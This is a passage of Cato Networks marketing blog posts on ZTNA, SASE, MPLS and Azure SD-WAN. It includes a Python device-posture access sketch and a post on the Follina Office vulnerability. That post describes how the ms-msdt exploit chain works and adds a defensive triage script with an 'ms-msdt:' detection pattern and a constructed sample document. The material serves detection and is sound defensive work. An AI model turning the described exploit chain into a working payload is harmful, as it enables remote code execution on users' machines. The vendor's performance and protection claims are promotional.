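    allowed_roles: frozenset
    required_tools: frozenset = frozenset()
    max_patch_age_days: int = 90
    require_compliance: bool = False
    allowed_os: frozenset = frozenset()         # empty set means any OS
    allowed_countries: frozenset = frozenset()  # empty set means anywhere


def evaluate(role, posture, policy):
    """Return (allowed, reasons). Any failed check denies; missing posture fails closed."""
    if role not in policy.allowed_roles:
        return False, ["role not entitled to resource"]
    if posture is None:
        return False, ["no posture report from device"]
    reasons = []
    missing = policy.required_tools - posture.security_tools
    if missing:
        reasons.append("missing security tools: " + ", ".join(sorted(missing)))
    if posture.patch_age_days > policy.max_patch_age_days:
        reasons.append(
            f"patch level {posture.patch_age_days}d old, limit {policy.max_patch_age_days}d"
        )
    if policy.require_compliance and not posture.policy_compliant:
        reasons.append("device not compliant with corporate policy")
    if policy.allowed_os and posture.os not in policy.allowed_os:
        reasons.append(f"OS {posture.os} not permitted")
    if policy.allowed_countries and posture.country not in policy.allowed_countries:
        reasons.append(f"location {posture.country} not permitted")
    return (not reasons), reasons


# Hypothetical resources: a low-sensitivity wiki and a sensitive finance database.
POLICIES = {
    "wiki": ResourcePolicy(allowed_roles=frozenset({"employee", "finance"})),
    "finance-db": ResourcePolicy(
        allowed_roles=frozenset({"finance"}),
        required_tools=frozenset({"edr", "disk-encryption"}),
        max_patch_age_days=30,
        require_compliance=True,
        allowed_os=frozenset({"windows", "macos"}),
        allowed_countries=frozenset({"US", "DE"}),
    ),
}

# Constructed posture reports for two devices used by the same finance user.
MANAGED = DevicePosture("macos", 12, frozenset({"edr", "disk-encryption"}), True, "DE")
STALE = DevicePosture("windows", 75, frozenset({"disk-encryption"}), False, "DE")


def decide(role, posture, resource):
    """Evaluate one access request against the policy of the requested resource."""
    return evaluate(role, posture, POLICIES[resource])


if __name__ == "__main__":
    for device_name, device in (("managed", MANAGED), ("stale", STALE)):
        for resource in POLICIES:
            allowed, why = decide("finance", device, resource)
            print(f"{device_name:8} -> {resource:11} {'ALLOW' if allowed else 'DENY'} {why}")
```

The stale laptop still reaches the wiki but is refused the finance database, and the returned reasons give the help desk and the SOC something concrete to act on.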
ZTNA Should Be Deployed as Part of SASE
ZTNA is an invaluable tool for providing secure remote access to corporate resources. Its integrated access controls and case-by-case grants of access offer far greater security than a VPN. However, as mentioned above, ZTNA is not enough to implement zero trust security or to effectively secure an organization’s network and resources against attack. An attacker with access to a legitimate account - via compromised credentials or an infected device - may be granted access to corporate IT assets.
Effective zero trust security requires partnering ZTNA’s access control with security solutions capable of identifying and preventing abuse of a legitimate user account. Next-generation firewalls (NGFWs), intrusion prevention systems (IPS), cloud access security brokers, and other solutions can help to address the threats that ZTNA misses.
These capabilities can be deployed as standalone solutions, but this often results in a tradeoff between performance and security. Deploying perimeter-based defenses requires routing traffic through that perimeter, which adds unacceptable latency. On the other hand, most organizations lack the resources to deploy a full security stack at all of their on-prem and cloud-based service locations.
Secure Access Service Edge (SASE) provides enterprise-grade security without sacrificing network performance. By integrating a full network security stack into a single solution, SASE enables optimized performance by ensuring that expensive operations - such as decrypting a traffic stream for analysis - are only performed once. Its integrated network optimization capabilities and cloud-based deployment ensure high network performance and reliability, especially when backed by Cato’s network of dedicated backbone links between PoPs.
ZTNA as a standalone solution doesn’t meet corporate network security goals or business requirements. Deploying ZTNA as part of a SASE solution is the right choice for organizations looking to effectively implement zero trust.
Cato Protects Against Microsoft Office Follina Exploits
Cybersecurity researchers are lighting up Twitter with a zero-day flaw in Microsoft Office enabling attackers to execute arbitrary code on targeted Windows systems.
Earlier today Microsoft issued CVE-2022-30190, which describes the remote code execution (RCE) vulnerability within Office. It can be exploited when the Microsoft Support Diagnostic Tool (MSDT) is called via a URL from a calling application such as Word.
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.
The vulnerability was discovered by nao_sec, the independent cybersecurity research team, who found a Word document ("05-2022-0438.doc") uploaded to VirusTotal from an IP address in Belarus. The Microsoft post explained how to create the payload and various workarounds.
Describing the vulnerability, nao_sec writes on Twitter, “It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code.” The Hacker News quotes security researcher Kevin Beaumont, saying that “the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload.”
Beaumont has dubbed the flaw "Follina," because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.
Cato Immediately Protects Users Worldwide
Within hours of Microsoft’s reporting, Cato researchers were already working on implementing protections for Cato customers worldwide. Already, Cato’s multilayered security defense fully protected Cato-connected users. While no further action is needed, Cato customers are advised to patch any affected systems.
There are currently three ways attackers can exploit this vulnerability:
Users can download a file or application containing the payload that will invoke the MSDT locally.
Users can download a file or application containing the payload that will get the invocation from the Internet (from the attacker’s sites).
A user’s browser receives the payload in the response to direction from a malicious site and runs MSDT.
All three approaches are already blocked using the Cato Advanced Threat Prevention (ATP) capabilities. Cato’s anti-malware inspects and will block downloading of files or applications with the necessary payload to execute Follina. Cato IPS will detect and prevent any invocation from across the network or the Internet.
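The two traits quoted above (an external link in the Word document, and fetched HTML that references the ms-msdt scheme) can be checked for in files at rest. The following triage sketch is an added example and is not Cato's detection logic; the sample document and HTML are constructed in memory, and treating every external relationship other than a hyperlink as suspicious is an assumption made for this illustration.

```python
import html
import io
import re
import urllib.parse
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
MSDT_SCHEME = re.compile(r"ms-msdt\s*:", re.IGNORECASE)


def external_relationships(docx_bytes):
    """List (part, relationship type, target) for every TargetMode="External" entry."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            data = zf.read(name)
            # Relationship parts never need a DTD; refuse them rather than
            # expand entities from an untrusted file.
            upper = data.upper()
            if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
                raise ValueError(f"{name}: DTD or entity declaration in relationship part")
            root = ET.fromstring(data)
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found


def triage_document(docx_bytes):
    """Keep external relationships that are not plain hyperlinks.

    Assumption for this sketch: hyperlinks load only when clicked, while other
    external relationships (templates, embedded objects, frames) can make Word
    fetch remote content when the document is opened.
    """
    return [r for r in external_relationships(docx_bytes) if r[1] != "hyperlink"]


def references_msdt(content):
    """True if text mentions the ms-msdt scheme, after undoing HTML-entity and
    percent encoding. Heavier obfuscation will evade a string match like this."""
    decoded = urllib.parse.unquote(html.unescape(content))
    return bool(MSDT_SCHEME.search(decoded))


def build_sample(rels_xml):
    """Build a minimal constructed .docx container holding only a relationship part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample: one external object link, one ordinary hyperlink, one internal part.
_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="{_BASE}oleObject"
                Target="https://example.invalid/page.html" TargetMode="External"/>
  <Relationship Id="rId2" Type="{_BASE}hyperlink"
                Target="https://example.com/" TargetMode="External"/>
  <Relationship Id="rId3" Type="{_BASE}styles" Target="styles.xml"/>
</Relationships>"""

# Constructed HTML with an inert placeholder instead of diagnostic-tool arguments.
SAMPLE_HTML = '<script>location.href = "ms-msdt:constructed-placeholder";</script>'

if __name__ == "__main__":
    for part, rel_type, target in triage_document(build_sample(SAMPLE_RELS)):
        print(f"review: {part} has external {rel_type} -> {target}")
    print("fetched HTML references ms-msdt:", references_msdt(SAMPLE_HTML))
```

A hit from either check is a reason to quarantine the file and review it, not a verdict on its own: legitimate documents also use external templates.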
As we have witnessed with Log4j, vulnerabilities such as these can take organizations a very long time to patch. Log4j exploitations are still observed to this day, six months after its initial disclosure. With Cato, enterprises no longer see the delays from patching and are protected in record time.
What Others Won’t Tell You About MPLS
MPLS (Multiprotocol Label Switching) has been an industry standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network.
5 Considerations for Evaluating MPLS and Its Alternatives
1. Agility: Can Your Network Move at the Speed of Business?
Modern enterprises need a solution that enables them to expand their business quickly and connect new sites to their existing networks. But traditional MPLS requires rolling out permanent infrastructure, which can take months and keeps businesses dependent on telco service and support.
2. Cost: Is Your Cost Per Megabit Too High?
The modern enterprise network is internet-bound, which makes it bandwidth-intensive. Enterprises need a solution that is priced in an internet-friendly manner since counting every megabit is counter-productive. But MPLS costs are megabit-based, and each megabit is pricey. Redundant circuits, resilient routing and WAN optimization drive the bill even higher.
3. Flexibility: Can The Business Transition Between On and Off-site Work?
New, post-pandemic workplaces have to be able to automatically transition between remote and on-site work. But in case of connectivity issues, transitioning to MPLS backups could cause significant delays that impede productivity.
4. Security: Can Enterprise Users Access Resources Anywhere?
To support remote work and a distributed workforce, resources, users, data and applications need to be secured wherever they are. But MPLS VPNs are hard to manage and backhauling traffic to the data centers adds latency, making the network vulnerable.
5. Management: Do You Have Visibility and Control of Your Network?
Modern businesses need co-managed networks so they can have visibility and control without having to take care of all the heavy lifting. But MPLS requires businesses to control the entire network or hand it all over to telcos.
Is SD-WAN the Solution for MPLS’s Shortcomings?
SD-WAN can replace some types of MPLS traffic, saving businesses from many of MPLS’ costs. However, SD-WAN doesn’t answer all business needs, including:
Cloud - SD-WAN focuses on physical WAN.
Security - SD-WAN employs only basic security features.
Remote and Hybrid Work - SD-WAN is a branch-oriented solution that cannot support remote work on its own.
Visibility - SD-WAN requires adding more vendors, which creates fragmented visibility.
How SASE Answers All Future WAN Needs
The solution for all future enterprise network needs is a converged solution that includes SD-WAN, a global backbone, pervasive security, and remote access in a single cloud offering.
A SASE platform offers just that:
A single platform for all capabilities, which can be activated separately at the flip of a switch.
A global WAN backbone over the cloud, ensuring traffic runs smoothly with minimal latency across global PoPs.
A unified security-as-a-service engine by converging ZTNA with SD-WAN.
A single pane of glass for all policies, configurations, monitoring, and analytics.
Flexible management - self-service, co-managed, or fully managed.
Read more about MPLS vs. SASE in the complete eBook, What Others Won’t Tell You About MPLS.
Azure SD-WAN: Cloud Datacenter Integration with Cato Networks
As critical applications migrate into Microsoft Azure, enterprises are challenged with building a WAN that can deliver the necessary cloud performance without dramatically increasing costs and complexity. There’s been no good approach to building an Azure SD-WAN — until now. Cato’s approach to Azure SD-WAN improves performance AND simplifies security, affordably. Let’s see how.
Azure SD-WAN’s MPLS and SD-WAN Problem
When organizations start relying on Azure, two problems become increasingly apparent. First, how do you secure your Azure instance? Running virtual firewalls in Azure adds complexity and considerable expense, necessitating purchase of additional cloud compute resources and third-party licenses. What’s more, virtual firewalls are limited in capacity, requiring upgrades as traffic grows. Cloud performance may suddenly decline because the firewall is choking the network. Adding other cloud instances requires additional tools, complicating operations.
You can continue to rely on your centralized security gateway, backhauling traffic from branch offices for inspection by the gateway before sending the traffic across the Internet to Azure. You can even improve the connection between the gateway and Azure with a premium connectivity service, such as Azure ExpressRoute. But, and here’s the second issue, how do you deal with the connectivity problem?
Branch offices that might otherwise be a short hop away from an Azure entrance point must now send traffic back to the centralized gateway for inspection before reaching Azure. The approach does nothing for mobile users who sit off the MPLS network regardless.
And what happens as your cloud strategy evolves and you add other cloud datacenter services, such as Amazon AWS or Google Cloud? Now you need a whole new set of security and connectivity solutions adding even more cost and complexity.
Nor does edge SD-WAN help. There’s no security built into edge SD-WAN, so you haven’t addressed that problem. There’s also no private global network so you’re still reliant on MPLS for predictable connectivity. Edge SD-WAN solutions also require the cost and complexity of deploying additional edge SD-WAN appliances to connect to the Azure cloud. And, again, none of this helps with mobile users, which are also out of scope for edge SD-WAN.
How Azure SD-WAN Works to Connect Cato and Azure
Cato addresses all of the connectivity and security challenges of Azure SD-WAN. Cato’s global private backbone spans 75+ points of presence (PoPs) across the globe, providing affordable premium connectivity worldwide. Many of those Cato PoPs collocate within the same physical datacenters as entrance points to Azure. Connecting from Azure to Cato is only a matter of crossing a fast LAN connection, giving Cato customers ExpressRoute-like performance at no additional charge.
To take advantage of Cato’s unique approach, Cato customers do two things. First, to connect Cato and Azure, enterprises take advantage of our agentless configuration, establishing IPsec tunnels between the two services and establishing the PoP as the egress point for Azure traffic. There’s no need to deploy additional agents or virtual appliances. Cato will then optimize and route Azure traffic from any Cato PoP along the shortest and fastest path across Cato Cloud to the destination PoP.
Second, sites and mobile users send their Azure traffic to Cato by establishing encrypted tunnels across any Internet connection to the nearest Cato PoP. Sites will run a Cato Socket, Cato’s SD-WAN appliance, or establish IPsec tunnels from an existing third-party security device, and mobile users run the Cato mobile client on their devices.
Alternatively, if you’d like to leverage all of Cato’s SD-WAN capabilities in Azure, you can easily deploy Cato’s virtual socket instead of IPsec tunnels, which includes automatic PoP selection, high availability, and automatic failover. The beauty of Cato’s virtual socket is that you can easily deploy it in minutes instead of hours. To get started with Cato virtual socket, search for Cato Networks in the Azure marketplace. Then, click Get It Now, and follow the outlined configuration guidelines.
How Azure SD-WAN Secures Azure Resources
In addition to connectivity, Cato’s Azure SD-WAN solution secures cloud resources against network-based threats. Every Cato PoP provides Cato’s complete suite of security services, eliminating the need for backhauling.
Cato Security as a Service is a fully managed suite of enterprise-grade and agile network security capabilities, that currently includes application-aware next-generation firewall-as-a-Service (FWaaS), secure web gateway with URL filtering (SWG), standard and next-generation anti-malware (NGAM), IPS-as-a-Service (IPS), and Cloud Access Security Broker (CASB). Cato can further secure your network with a comprehensive Managed Threat Detection and Response (MDR) service to detect compromised endpoints.
Azure instances and all resources connected to Cato, including sites, mobile users and other cloud resources, are protected through a common set of security policies, avoiding the complexity that comes with purchasing security tools unique to Azure or other cloud environments.
Azure SD-WAN Benefits
The bottom line is that Azure SD-WAN delivers connectivity and security with minimal complexity and cost:
Superior Microsoft Azure performance
The combination of global Cato PoPs, a global private backbone and Microsoft Azure colocation accelerates Microsoft Azure application performance by up to 20X vs. a typical corporate Internet-based connection. Not only is latency minimized but Cato’s built-in network optimizations further improve data transfer throughput. And all of that is done for branch offices as well as mobile users. The result is a superior user experience without the need for premium cloud provider transport services.
Security and deployment simplicity
With Cato, organizations don’t have to size, procure and manage scores of branch security solutions normally needed for the direct Internet access critical to delivering low latency cloud connectivity. Security is built into Cato Cloud; cloud resources are protected by the same security policy set as any other resource or user on the enterprise backbone. Cato’s agentless configuration also means customers don’t have to install additional SD-WAN appliances in the Azure cloud. These benefits are particularly significant for multi-cloud enabled organizations which normally would require separate connectivity solutions for each private datacenter service. (However, if you’d like to leverage additional capabilities in Azure, you can deploy the integration in minutes with Cato’s virtual Socket.)
Networking and security agility
Cato’s SD-WAN’s simplicity, Azure integration, and built-in security stack enable branch offices and mobile users to get connected to Microsoft Azure in minutes or hours vs. weeks or months for branch office appliance-based SD-WAN.
Affordable and fast ROI
Enterprises get superior cloud performance without paying for the high cost of branch office SD-WAN hardware, carrier SD-WAN services, or Microsoft Azure ExpressRoute transport. Nor do companies need to invest in additional security services to protect cloud resources with Cato.
For more information on how Cato integrates with the cloud, contact Cato Networks or check out this eBook on Migrating your Datacenter Firewall to the Cloud.
The Only SASE RFP Template You’ll Ever Need
Why do you need a SASE RFP?
Shopping for a SASE solution isn’t as easy as it sounds... SASE is an enterprise networking and security framework that is relatively new to the enterprise IT market (introduced by Gartner in 2019.) And less than 3 years young, SASE is often prone to misunderstanding and vendor “marketecture.” Meaning: If you don’t ask the right questions during your sales and vendor evaluation process, you may be locked into a solution that doesn’t align with your current and future business and technology needs.
A Quick Note about Cato’s RFP Template
Do a quick Google search and you’ll find millions of general RFP templates. That being said, Cato’s RFP template only covers the functional requirements of a future SASE deployment. There are no generic RFP requirements in our template, like getting the vendor details of your vendor companies.
So, What Must a SASE RFP Template Include?
Cato Networks has created a comprehensive, 13-page SASE RFP template, which contains all business and functional requirements for a full SASE deployment. Just download the template, fill in the relevant sections to your enterprise, and allow your short-listed vendors to fill in the remainder. While you may see some sections that are not relevant to your particular organization or use case, that's all right. It’s available for your reference, and to help you plan any future projects.
A Sneak Peek at Cato’s RFP Template
If you’d like a preview of Cato Networks’ SASE RFP template, we’re providing you with a high-level outline. Take a look at this "quick-guide", and then download the full SASE RFP template to put it into practice.
1. Business and IT overview
You’ll describe your business and IT. Make sure to include enough details for vendors to understand your environment so they can tailor their answers to your specific needs and answer why their solution is valuable to your use case.
2. Solution Architecture
Understand your proposed vendor’s architecture, what the architecture includes, what it does and where it is placed (branch, device, cloud). Comprehending vendor architecture will allow you to better determine how a vendor scales, how they address failures, deliver resiliency, etc.
3. Solution Capabilities
Deep dive into your proposed vendor functionalities. The idea is to select all sections relevant to your proposed SASE deployment, and have the vendor fill them out.
Receive a thorough exploration of a proposed vendor’s SD-WAN offering, covering link management, traffic routing and QoS, voice and latency-sensitive traffic, throughput and edge devices, monitoring and reporting, site provisioning, gradual deployment / co-existence with legacy MPLS networks.
Understand traffic encryption, threat prevention, threat detection, branch, cloud and mobile security, identity and user awareness, policy management and enforcement, as well as security management analytics and reporting.
Determine vendor components needed to connect a cloud datacenter to the network, amongst other areas.
Mobile (SDP / ZTNA)
Understand how vendors connect a mobile user to the network, their available mobile solutions for connecting mobile users to WAN and cloud, and other key areas.
Explore your vendor’s global traffic optimization, describe how they optimize network support to mobile users, and more.
4. Support and Services
Evaluate service offering and managed services. This is the perfect time to ask and understand whether your proposed vendor uses “follow-the-sun" support models and decide whether you want a self-managed, fully managed, or co-managed service.
Support and Professional services
Understand if vendors abide by “follow-the-sun” support, their hours of support and more.
Get a sense of vendor managed services in several key areas.
Next Steps: Get the Full SASE RFP / RFI Template
Whether you’re new to SASE or a seasoned expert, successful SASE vendor selection starts with asking the right questions. When you know the correct questions to ask, it’s easy to understand if a SASE offering can meet the needs of your organization both now and in the future. Download Cato Networks’ full SASE RFP / RFI Made Easy Template, to begin your SASE success story.
Don’t Ruin ZTNA by Planning for the Past
Zero trust network access (ZTNA) is an integral part of an enterprise security strategy, as companies move to adopt zero trust security principles and adapt to more distributed IT environments. Legacy solutions such as virtual private networks (VPNs) are ill-suited to the distributed enterprise and do not provide the granular access controls necessary to protect an organization against modern cyber threats.
However, not all ZTNA solutions are created equal. In some cases, ZTNA solutions are designed for legacy environments where employees and corporate resources are located on the corporate LAN. Deploying the wrong ZTNA solution can result in tradeoffs between network performance and security.
Where ZTNA Can Go Wrong
Three of the primary ways in which ZTNA goes wrong are self-hosted solutions, web-only solutions, and solutions only offering agent-based deployments.
Some ZTNA solutions are designed to be self-hosted or self-managed. An organization can deploy a virtual ZTNA solution on-prem or in the cloud and configure it to manage access to the corporate resources hosted at that location.
These self-hosted ZTNA solutions are designed based on a perimeter-focused security model that no longer meets the needs of an organization’s IT assets. Self-hosted ZTNA is best suited to protecting locations where the virtual appliance can be deployed, such as in an on-prem data center or an Infrastructure as a Service (IaaS) cloud service.
However, many organizations use a variety of cloud services, including Software as a Service (SaaS) offerings where a self-hosted ZTNA solution cannot be easily deployed. This and the fact that expanding self-hosted ZTNA to support new sites requires additional solutions or inefficient routing, means that these solutions are less usable and offer lower network performance than a cloud-native solution.
Often, security programs focus too much on the more visible aspects of an organization’s IT infrastructure. Web security focuses on websites and web apps instead of APIs, and ZTNA is targeted toward the protection of enterprise web apps.
However, companies commonly use various non-web applications as well. For example, companies may want to provide access to corporate databases, remote access protocols such as SSH and RDP, virtual desktop infrastructure (VDI), and other applications that do not run over HTTP(S).
A ZTNA solution needs to provide support for all apps used by an enterprise. This includes the ability to manage access to both web and non-web enterprise applications.
Only Agent-Based Deployment
Some ZTNA solutions are implemented using agents that are deployed on each user’s endpoint. These agents interact with a self-hosted or cloud-based broker that allows or denies access to corporate resources based on role-based access controls. By using agents, a ZTNA solution can provide a more frictionless experience to users.
While an agent-based deployment has its benefits, it may not be a fit for all devices. The shift to remote and hybrid work has driven the expanded adoption of bring your own device (BYOD) policies and the use of mobile devices for work. These devices may not be able to support ZTNA agents, making it more difficult to manage users’ access on these devices.
Support for agent-based deployments can be a significant asset for a ZTNA solution. However, implementing ZTNA only via agents deployed on the endpoint can result in some devices being unable to access corporate resources or being forced to use workarounds that could degrade performance or security.
Choose the Right ZTNA Solution
ZTNA provides a superior alternative to VPNs for secure remote access. However, the success of an organization’s ZTNA deployment can depend on selecting and deploying the right ZTNA solution.
Some key requirements to look for when evaluating ZTNA solutions include:
Globally Distributed Service: ZTNA solutions that are self-managed and can only be deployed in certain locations create tradeoffs between the performance and security of corporate applications. A ZTNA solution should be responsive everywhere so that employees can easily access corporate resources hosted anywhere, which can only be achieved by a globally distributed, cloud hosted, ZTNA solution.
Wide Protocol Support: Many of the most visible applications used by companies are web-based (webmail, cloud-based data storage, etc.). However, other critical applications may use different protocols yet have the same need for strong, integrated access management. A ZTNA solution should offer support for a wide range of network protocols, not just HTTP(S).
Agentless Option: Agent-based ZTNA solutions can help to achieve better performing and more secure remote access management; however, they are not suitable for all devices and use cases. A ZTNA solution should offer both agent-based and agentless options for access management.
Cato SASE Cloud offers ZTNA as part of an integrated Secure Access Service Edge (SASE) solution. By moving access control and other security and network optimization functions to cloud-based solutions, Cato SASE Cloud ensures that ZTNA services are accessible from anywhere and support a range of protocols. Also, with both agent-based and agentless options, Cato SASE Cloud ensures that all users have the ability to efficiently access corporate resources.
Talking SASE to Your Board: A CIO’s Guide to Getting to ‘Yes’
Introduction: Discussing Transformation with the Board
Technology is a strategic requirement for every global organization and its board of directors, regardless of industry. No one is immune from the machinations of technological evolution and the associated disruption that follows. As a result, we can no longer separate business strategy from technology strategy, forcing corporate boards to converge their decision-making processes around a strategic agenda of innovation and risk-mitigation. So, CIOs must take an innovative approach when discussing any transformational change with the board.
How to Position Network Transformation to the Board
Network transformation is a game-changing strategy that helps drive business growth and market acquisition. So, if not positioned effectively to address board-level concerns, it will impact the long-term ability to execute and advance business objectives. When addressing the board, CIOs must position such technology strategies with critical board-level concerns in mind and discuss them in the context of:
Can this strategy help us improve IT responsiveness and ability to support business growth?
What value will the business realize through this initiative?
What is the security impact of this strategy on our critical applications?
How would this strategy enable IT organizations to better mitigate increasing security risk?
What would be the short- and long-term financial impact of this initiative?
What is the impact on our current and next-gen IT talent?
Core to discussing these strategies is articulating the necessity of simplification, optimization, and risk-mitigation in delivering business outcomes through network transformation. And this is where Secure Access Service Edge (SASE) becomes that strategic conversation for board-level engagement.
SASE is the network transformation strategy that addresses board-level concerns around risk, growth, and financial flexibility. SASE converges networking and security capabilities into a single high-performing cloud-native architecture that allows organizations to scale core business operations through efficiency and performance, while extending consistency in policy and protections. So, presenting a SASE strategy to the board requires CIOs to be crisp and clear when highlighting key business benefits.
[Figure 1]
A Conversational Guide to Engaging the Board on SASE
In February 2019, Deloitte defined a 3-dimension conversation model for CIOs when engaging technology boards. This engagement model defines the thought processes of board members when evaluating technology initiatives for sustaining business growth and maximizing balance sheets.
[Figure 2]
To influence the board’s decision-making process, CIOs can lean on this model to guide their discussion of SASE’s positive impact on business growth and sustainability. While SASE may not speak specifically to each sub-dimension of the Deloitte model, the core focus on Strategy, Risk and Financial Performance can be adapted as a conversation guide when discussing SASE and Network Transformation.
Highlight the Strategic Value of SASE
Disruptive technology drives business growth and market share acquisition. However, CIOs should present SASE not as a disruptive technology, but rather as a disruptive approach to existing technologies. When positioning SASE to boards, CIOs should emphasize the strategic potential of SASE’s disruptive approach to simplifying network operations, which, by extension, accelerates business growth.
CIOs must articulate the strategic business benefits of converging networking and security functions into a single cloud-native software stack with unlimited scalability to support business growth. An obvious benefit is how SASE accelerates and optimizes access to critical applications, enhancing the collection, analysis, and securing of data, while improving user experiences and efficiency. Another benefit is how SASE eliminates scaling challenges when more capacity is required to service business growth and expansion.
An imperative for CIOs is to highlight use cases where SASE proves its strategic value across the entire enterprise. Successful SASE implementations make it easier to pursue Cloud Migration, Work-From-Home (WFH), UCaaS, and Global Expansion projects, just to name a few. Through these, we observe how SASE not only eliminates networking and security headaches, but also streamlines the efforts of IT teams, allowing them to place more focus on these strategic initiatives. SASE has now become that true platform for digital transformation and an enabler of business growth.
In short, CIOs must emphasize how SASE enables the network to scale at the speed of business, instead of the business being limited by the rigidity and inflexibility of the network. This approach allows CIOs to demonstrate SASE’s strategic value to the overall business by removing technical challenges that limit growth.
SASE as a disruptive approach to simplifying network operations
SASE as a “Growth Enabler” – optimized access improves business operations
Unlimited scalability at the speed of business
[Figure 3]
Present the Risk-mitigation Value of SASE
No one is immune to cyber risk, and boards will naturally question cyber readiness for critical projects that support business growth. Typically, discussions around risk are fragmented along network support for new initiatives, and security risk to data and privacy. This overlooks the obvious linkage between the two, but SASE allows CIOs to blend these conversations to address critical board-level concerns.
Considering this, presenting the risk-mitigation value of SASE requires CIOs to address a key imperative of most boards – SASE must help overcome increased complexity and mitigate cyber risks today and well into the future.
Years of acquiring point products to solve point problems have bloated technology environments, resulting in security blind spots, increased complexity, and unmanageable risk. SASE proves its risk mitigation value by simplifying protection schemes, increasing visibility, improving threat detection and response, unifying security policies, and facilitating easier auditing. CIOs must also emphasize SASE’s simplistic Zero-Trust access approach to critical applications, delivering consistent policy enforcement across the entire network.
Finally, CIOs must outline how SASE enables organizations to meet regulatory and compliance mandates and policies. This conversational approach reinforces SASE’s risk-mitigation value and alleviates one of the biggest board-level concerns – the risk of ransomware and business disruption.
Highlight cyber risks without SASE – complexity, blind spots, and reputation loss
Risk Mitigation value – holistic data protection schemes
True SASE is a platform that enables compliance mandates
[Figure 4]
Discuss SASE as a Financial Performance Enabler
Boards are laser-focused on the long-term financial performance goals of the business. The board needs to understand how network transformation will improve their balance sheets and customer retention. While many CIOs hesitate to link technology investments to financial performance metrics, articulating the positive impact of SASE on financial performance can position it as an ROI-enabler.
In our whitepaper, “ROI of Doing Nothing”, we highlight the long-term financial impact of delaying network transformation with SASE. Whether to become a Stage 1 company (transition early to anticipate challenges) or a Stage 2 company (delay, resulting in increased requirements and subsequent costs) comes down to the overall financial burden organizations are prepared to withstand. CIOs must promote the positive ROI of SASE in securing the long-term financial structure of the business.
When evaluating the feasibility of network transformation with SASE, CIOs must speak to the business and talent efficiencies to be gained. Today, most enterprises exhaust considerable resources running and maintaining inefficient infrastructures. This often produces outages across the network, which impacts operations across the entire business. The financial impact of this is not only measured in maintenance contracts and renewal/upgrade fees, but also in application availability, performance, and scalability.
SASE reduces costs by retiring expensive and inefficient systems, and this also directly impacts their IT talent performance. Similar to the strategic value, less time spent on mundane technical support activities enables IT teams to direct their support efforts towards strategic, revenue-generating initiatives. This increases revenue generated per-head, thus improving the operational cost model.
Highlighting key performance metrics related to revenue and ROI will gain broad consensus for SASE projects. Mapping key performance requirements into business ROI gained via SASE demonstrates how it transforms not only networking and security, but also the overall IT and business operations that impact the bottom line.
SASE as an ROI enabler – lower TCO
Delaying SASE – impacts long-term cost structures
IT support for revenue-generating initiatives
[Figure 5]
A SASE Engagement Model Allows for CIO-Board Partnership
Justifying network transformation can be challenging considering it requires a paradigm shift towards a new way of viewing IT operations and its impact on the broader business. By following a simple board-level engagement model focusing on Strategy, Risk and Performance, CIOs can build a more compelling discussion on the numerous advantages in SASE that extend far beyond simple network and security efficiencies. It is important to develop that CIO-Board partnership that explores these through a business outcome lens. SASE pursued with strategic business enablement in mind alleviates the key board-level concerns, while empowering CIOs to deliver the resilient, cost-effective converged platform that enables optimal IT operations, mitigates risk, and produces long-term ROI.
Engaging the board on new technology approaches such as SASE does not have to be scary. SASE provides a new way to envision the Digital Infrastructure of the Future, and highlighting the main concerns of most board members is the most direct approach to discussing this topic. This article provides a simple guide for mapping board-level concerns to the intrinsic advantages of SASE, while providing a roadmap to realizing the key benefits.
To learn more about how CIOs succeed in this digital era, download our “First 100 Days as a CIO” guide.
Cato Expands to Marseilles and Improves Resiliency Within France
Cato just announced the opening of our new PoP in Marseilles, France. Marseilles is our second PoP in France (Paris being the first) and our 20th in EMEA. Overall, Cato SASE Cloud is comprised of 70+ PoPs worldwide, bringing Cato’s capabilities to more than 150 countries.
As with all our PoPs, Marseilles isn’t just a “gateway” that secures traffic to and from the Internet. Cato PoPs are far more powerful. Like the rest of our PoPs, Marseilles will run Cato's Single Pass Cloud Engine (SPACE), Cato's converged cloud-native software. Cato SPACE provides enterprise-grade threat prevention, data protection, and global traffic optimization for East-West traffic to other Cato PoPs and North-South traffic to the Internet or the cloud.
Cato SPACE sets speed records in the SASE world by processing up to 3 Gbps of traffic per site with full decryption and all security engines active at line rate. Cato SPACE is so effective and reliable, that enterprises can replace legacy MPLS networks and security appliances.
The Marseilles PoP, like all of our PoPs, is equipped with multiple compute nodes running many SPACE engines. When a site’s traffic hits the Marseilles PoP, the traffic flow is immediately assigned to the most available SPACE engine.
Should a SPACE engine fail within a PoP, flows are automatically processed by another SPACE instance. Should the datacenter hosting a Cato PoP fail, users and resources automatically reconnect to the next available PoP as all PoPs are equipped with enough surplus capacity to accommodate the additional load.
A case in point was the recent Interxion datacenter outage. The datacenter housed the London Metal Exchange and Cato's London PoP. The outage disrupted the Exchange for nearly five hours. Cato customers were also impacted – for 30 seconds – as London-connected sites and users automatically and transparently moved over to Cato's Manchester and Dublin PoPs. Should the Marseilles PoP fail, Cato's self-healing architecture automatically and transparently moves sites and users to the next best PoP, likely the one in Paris.
